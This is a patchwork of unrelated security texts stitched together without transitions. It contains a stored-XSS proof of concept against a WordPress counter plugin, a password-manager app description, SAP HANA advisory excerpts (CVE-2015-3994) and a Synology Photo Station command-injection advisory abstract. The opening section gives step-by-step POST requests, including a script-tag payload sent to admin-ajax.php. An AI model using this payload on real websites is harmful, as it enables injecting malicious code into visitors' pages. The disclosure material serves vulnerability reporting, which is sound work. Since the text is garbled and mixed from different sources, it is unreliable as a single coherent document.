Any authenticated or non-authenticated user can perform a stored XSS attack simply by exploiting wp_ajax_nopriv_check_stat action. Plugin uses a widget to display website's visits, so any page that contains this widget will also load the malicious JS code.
2. Proof of Concept
* Send a post request to `http://www.free-counter.org/Api.php`in order to reveal the counter id of the vulnerable site. The POST data must contain the following vars: `action=create_new_counter&site_url=http%3A%2f%my.vulnerable.website.com` * As a response we get a serialized indexed array. The value that we need to know is the 'counter_id'. * Send a post request to `http://my.vulnerable.website.com/wp-admin/admin-ajax.php`with data: `action=check_stat&id_counter= <counter_id from step 2>&value_=<script>alert(1)</script>` * Visit a page of the infected website that displays plugin's widget.
Note that the plugin uses the update_option function to store the $_POST['value_'] contents to DB so any code inserted there will be escaped. Even though a malicious user can omit the quotes in the src attr of the script tag. Most modern browsers will treat the tag as they were there.
Overview "With the Password Manager Secret Server app, you can access passwords for an EXISTING on-premise Secret Server or Secret Server Online account."
"This password app combines enterprise-level security with home-user simplicity, making it a convenient choice for both IT professionals AND home users."
"Count on Extreme Security: Your passwords are safely stored on a secure server-not on your phone. You get top-level AES 256 bit encryption. You get a personal pin code lock for an additional layer of security. A built-in password generator creates strong, unique passwords. Your data is backed by a leading enterprise password management platform."
"Safe Storage for: Enterprise-level or personal passwords. Bank account and tax numbers. ATM Pins. Social security numbers. Credit card numbers. Combination lock numbers"
Onapsis Security AdvisoryONAPSIS-2015-007: SAP HANA Log Injection Vulnerability
1. Impact on Business =====================
Under certain conditions the SAP HANA XS engine is vulnerable to arbitrary log injection, allowing remote authenticated attackers to write arbitrary information in log files. This could be used to corrupt log files or add fake content misleading an administrator.
Risk Level: Medium
2. Advisory Information =======================
- - Public Release Date: 2015-05-27 - - Subscriber Notification Date: 2015-05-27 - - Last Revised: 2015-05-27 - - Security Advisory ID: ONAPSIS-2015-007 - - Onapsis SVS ID: ONAPSIS-00140 - - CVE: CVE-2015-3994 - - Researcher: Fernando Russ, Nahuel D. Sánchez - - Initial Base CVSS v2: 4.0 (AV:N/AC:L/Au:S/C:N/I:P/A:N)
Onapsis Security Advisory ONAPSIS-2015-006: SAP HANA Information Disclosure via SQL IMPORT FROM statement
1. Impact on Business =====================
Under certain conditions some SAP HANA Database commands could be abused by a remote authenticated attacker to access information which is restricted. This could be used to gain access to confidential information.
------------------------------------------------------------ ------------ Command injection vulnerability in Synology Photo Station ------------------------------------------------------------------------ Han Sahin, May 2015
------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A command injection vulnerability was found in Synology Photo Station, which allows an attacker to execute arbitrary commands with the privileges of the webserver. An attacker can use this vulnerability to compromise a Synology DiskStation NAS, including all data stored on the NAS.
------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was tested on Synology Photo Station version 6.2-2858.
------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Synology reports that this issue has been resolved in Photo Station version 6.3-2945. https://www.synology.com/en-us/releaseNote/PhotoStation